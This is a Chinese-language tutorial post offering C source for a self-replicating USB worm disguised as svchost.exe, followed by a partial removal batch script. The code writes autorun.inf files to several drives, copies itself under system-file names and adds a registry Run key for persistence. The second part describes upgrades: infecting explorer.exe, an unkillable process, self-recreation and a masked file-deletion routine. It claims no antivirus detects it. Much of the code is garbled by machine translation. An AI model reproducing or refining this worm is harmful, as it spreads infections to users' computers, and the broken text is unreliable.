該病毒的功能:
1.在c盤、D盤、E盤和c:\windows\system和c:\windows中生成病毒體文件。
2.在c盤、D盤和e盤中生成自動運行文件。
3.註冊c:\windows\system\svchost.exe使其自動啟動。
4.在C:\windows\system下生成隱藏的DLL文件。
5.病毒執行後具有關聯復制的能力。這種病毒類似於普通u盤病毒的雛形,具有自我復制和操作的能力。下面的程序是在DEV-CPP 4.9.9.2(GCC編譯器)下編譯的。
請保存為SVCHOST。c編譯並運行。這種病毒對電腦無害。請放心研究。
/* SVCHOST。C */
/* SVCHOST.EXE */#定義服務編號6
# include & ltstdio.h & gt
# include & ltstring.h & gt
char * autorun = { "[autorun]\ n open = svchost.exe \ n \ n shell \ \ 1 = open \ n shell \ \ 1 \ \ command = svchost.exe \ n shell \ \ 2 \ \。
char * files _ autorun[10]= { " c:\ \ autorun . INF "," d:\\autorun.inf "," e:\ \ autorun . INF " };
char * files _ SVCHOST[SVCHOST _ NUM+1]= { " c:\ \ windows \ \ system \ \ ms mouse。DLL”,
" c:\ \ windows \ \ system \ \ svchost . exe "," c:\\windows\\SVCHOST.exe ",
" c:\\SVCHOST.exe "," d:\\SVCHOST.exe "," e:\\SVCHOST.exe "," svchost . exe " };
char * regadd = " reg add \ " HKLM \ \軟件\ \微軟\ \ Windows \ \當前版本\ \運行\ "/v SVCHOST/d C:\ \ Windows \ \系統\ \ SVCHOST . exe/f ";int copy(char *infile,char *outfile)
{
文件*輸入,*輸出;
炭化溫度;
if(strcmp(infile,outfile)!= 0 & amp& amp((input=fopen(infile," rb "))!= NULL)& amp;& amp((output=fopen(outfile," wb "))!=NULL))
{
而(!feof(輸入))
{
弗雷德(& amptemp,1,1,輸入);
fwrite(& amp;temp,1,1,輸出);
}
fclose(輸入);
fclose(輸出);
返回0;
}
否則返回1;
}
int main(void)
{
文件*輸入,*輸出;
int i,k;
for(I = 0;我& lt3;i++)
{
output=fopen(files_autorun[i]," w ");
fprintf(輸出,“%s”,自動運行);
fclose(輸出);
}
for(I = 0;我& lt= SVCHOST _ NUMi++)
{
if((input = fopen(files _ svchost[I]," rb)))!=空)
{
fclose(輸入);
for(k = 0;k & ltSVCHOST _ NUMk++)
{
copy(files_svchost[i],files _ svchost[k]);
}
I = SVCHOST _ NUM+1;
}
}
系統(regadd);/*註冊SVCHOST.exe以便在啟動時運行*/
返回0;
}在連載2中,妳會看到:
病毒破壞系統文件的方法、病毒感染文件的方法、病毒生成垃圾文件的方法以及病毒更加隱蔽的方法。這個版本的病毒有以下功能:
1.在所有磁盤的根目錄下生成svchost.com和autorun.inf文件。
2.生成病毒體:
c:\windows\wjview32.com
c:\windows\explorer.exe
c:\ windows \ system32 \ dllcache \ explorer . exe
c:\windows\system\msmouse.dll
c:\windows\system32\cmdsys.sys
c:\ windows \ system32 \ mstsc 32 . exe
3.病毒體c:\windows\explorer.exe感染原來的explorer.exe文件,這樣就不需要修改註冊表就可以啟動explorer.exe了。
4.修改HKEY _本地_機器\軟件\微軟\ Windows \當前版本\運行中的註冊表。
設置自啟動項(該操作不使用windowsAPI,防止用戶發現病毒體,實現並行執行)。
5.生成的autorun.inf改變了磁盤的打開方式,使得windows2000以上的系統無論怎麽選擇“打開”、“雙擊”、“資源管理器”都無法打開驅動器,而是運行了壹個病毒。
6.聯動能力,連接病毒體實現連接復制更新。
7.用進程連續調用進程,使得任務管理中的病毒進程無法結束。
8.繼續搜索磁盤。如果發現任何未感染的病毒,它將被感染。病毒刪除後,會在1秒內重建。
9.在c盤下生成5個垃圾文件(DESTORY_ infection _ any number)
10.附件刪除功能(為防止傷害,默認不執行該功能)。到目前為止,還沒有殺毒軟件可以查殺這種病毒。
這個病毒默認對機器無害(破壞碼已經屏蔽)。
提供病毒卸載程序(另存為X.BAT,雙擊運行卸載):@echo off
echo SK-中國SVCHOST殺手2007.6
由S.K .寫的回聲
taskkill/im mstsc32.exe/f
del c:\windows\wjview32.com
del c:\windows\explorer.exe
del c:\ windows \ system32 \ dllcache \ explorer . exe
del c:\ windows \ system \ ms mouse . dll